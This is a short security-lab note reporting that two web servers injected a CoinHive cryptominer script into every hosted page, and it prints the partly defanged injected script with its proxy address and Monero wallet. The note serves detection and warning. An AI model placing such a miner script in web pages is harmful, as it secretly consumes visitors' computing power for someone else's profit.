Server-level Cryptominer Injections

Labs Note

During an investigation on a recent case, we came across a malware infection that came directly from the server.

Upon further inspection, we found that there were at least two servers showing the same symptom: cryptominers had been automatically injected into every web page after the</head> or </title> tag. The sites themselves had not been infected. The malware was coming from the web server itself, which modifies web pages on the fly. The servers we have identified so far are and, with around 60 and 120 sites respectively.

This is the code being injected (line breaks added for readability):

<script src="hxxps://coinhive[.]com/lib/coinhive.min.js"></script><script>CoinHive.CONFIG.WEBSOCKET_SHARDS = [["ws://176.10.104 .249:8892"]];var miner = CoinHive.Anonymous('49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b');</script>

It’s a modification of the common CoinHive miner that uses an alternative proxy ( and mines directly to this Monero address 49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b.

Any webmasters with websites hosted on either of these servers are recommended to check with their hosting provider to resolve the issue.

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